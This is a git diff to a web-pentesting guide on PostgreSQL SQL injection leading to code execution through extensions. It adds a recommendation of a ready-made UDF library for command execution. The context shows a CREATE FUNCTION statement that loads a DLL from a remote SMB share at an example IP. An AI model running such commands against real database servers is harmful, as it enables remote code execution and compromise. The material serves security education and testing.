diff --git a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
index 49edbe6d2..6b3d7f4cc 100644
--- a/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
+++ b/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
@@ -288,6 +288,8 @@ Note how in this case the **malicious code is inside the DllMain function**. Thi
 CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
 ```
 
+The [PolyUDF project](https://github.com/rop-la/PolyUDF) is also a good starting point with the full MS Visual Studio project and a ready to use library (including: _command eval_, _exec_ and _cleanup_) with multiversion support.
+
 ### RCE in newest Prostgres versions
 
 In the **latest versions** of PostgreSQL, restrictions have been imposed where the `superuser` is **prohibited** from **loading** shared library files except from specific directories, such as `C:\Program Files\PostgreSQL\11\lib` on Windows or `/var/lib/postgresql/11/lib` on \*nix systems. These directories are **secured** against write operations by either the NETWORK\_SERVICE or postgres accounts.